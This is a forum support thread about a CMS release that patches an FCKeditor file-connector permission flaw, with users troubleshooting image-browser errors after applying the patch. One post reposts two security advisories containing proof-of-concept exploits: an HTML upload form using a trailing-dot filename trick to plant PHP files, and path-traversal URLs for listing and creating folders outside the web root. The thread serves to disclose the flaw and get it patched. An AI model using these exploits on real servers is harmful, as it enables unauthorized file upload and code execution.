0.12.2 Released! Please READ!
Re: 0.12.2 Released! Please READ!
Basically, the connector.php file isn't checking permissions. If used the right way, it can cause someone to upload anything to the uploads/images directory. My 2nd reply above basically explains how to fix it. I assume it'll be the same process in TinyMCE.
Re: 0.12.2 Released! Please READ!
OK, I hand-patched my good old 0.11.2. Hope 0.13 arrives soon !
Re: 0.12.2 Released! Please READ!
I updated to the latest version 0.12.2 and there's an error with the image browser.
When I wanna put an Image in my editor it won't work anymore. When I delete the code:
This fix is not good I think.... Please help!!!!!!
When I wanna put an Image in my editor it won't work anymore. When I delete the code:
Then it works just fine!!!require_once(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(__FILE__)))))))))) . '/include.php');
check_login();
This fix is not good I think.... Please help!!!!!!
Re: 0.12.2 Released! Please READ!
Is anyone else having an issue with this patch? I just tested it in 3 different places and fck image browser still works when logged in.
Re: 0.12.2 Released! Please READ!
Yes i stumbled over the issue.... i got an javascripterror. The directory listing is missing....
Best regards
Chris
Best regards
Chris
Re: 0.12.2 Released! Please READ!
Was this an upgrade to 0.12.2? Or the manual patching?
And I'm assuming this is IE 6...
And I'm assuming this is IE 6...
Re: 0.12.2 Released! Please READ!
oh, i patched it manually. cmsmadesimple is in version 0.12beta or so but with many changes. Yes it was the ie6...........
Re: 0.12.2 Released! Please READ!
Perhaps you should go to 0.12.1 stable to the first ...evoluzzer wrote: cmsmadesimple is in version 0.12beta
Re: 0.12.2 Released! Please READ!
Someone had the same issue while patching a 0.11.1 install this morning. I'm thinking your best bet it to upgrade fully to 0.12.2.
Re: 0.12.2 Released! Please READ!
i didn't have any problem on the upgrade. i already upgraded to php5.1.4!
Re: 0.12.2 Released! Please READ!
Replacing that one php file fixes the security problem - right? I don't need to do anything else?
Re: 0.12.2 Released! Please READ!
If you are runngin 0.12.1 then changing that one file will be enough (or you can download the diff package which replaces that file and version.php file)
about security flaw
Taken from SecurityFocus
and
Code: Select all
NSAG-¹196-23.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
[b]FCKeditor 2.2[/b]
Site of manufacturer:
http://www.fckeditor.net
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/893.html
Risk:
Critical
Description:
Detour of a filtration of expansions of files is possible.
Influence:
Loading of the forbidden files on target system.
Exploit:
<form action="http://host/filemanager/browser/default/connectors/php/connector
.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>
In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.)
As a result on a server the file testfile.php will be created
Decision:
The decision from the manufacturer is not known. Contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
Code: Select all
Advisory:
NSAG-¹195-23.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
FCKeditor 2.0 FC
Site of manufacturer:
http://www.fckeditor.net
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/952.html
Risk:
Hide
Description:
The output for limits of a virtual directory is possible.
Influence:
Listing of directories, creation of folders outside a virtual directory.
Exploit:
http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=GetFoldersAndFiles&Type=File&CurrentFolder=../../
http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAM
E
Decision:
To address on a site of the manufacturer http://www.fckeditor.net
Or contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected
from a various sort of attacks of malefactors!
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
-
- Forum Members
- Posts: 121
- Joined: Sun May 01, 2005 4:27 pm
- Location: Kent, UK
Re: 0.12.2 Released! Please READ!
I get thiis javascript error when trying to insert an image too:
Line:118
Char:2
Code:0
Error:Object required
URL:http://www.domain.com/modules/FCKeditor ... slist.html
I upgraded to 0.12.2 from 0.11.2 I think it was.
I'm using IE6 if that helps...
Line:118
Char:2
Code:0
Error:Object required
URL:http://www.domain.com/modules/FCKeditor ... slist.html
I upgraded to 0.12.2 from 0.11.2 I think it was.
I'm using IE6 if that helps...
Re: 0.12.2 Released! Please READ!
You made the patch to connector.php? It wasn't a full upgrade, right?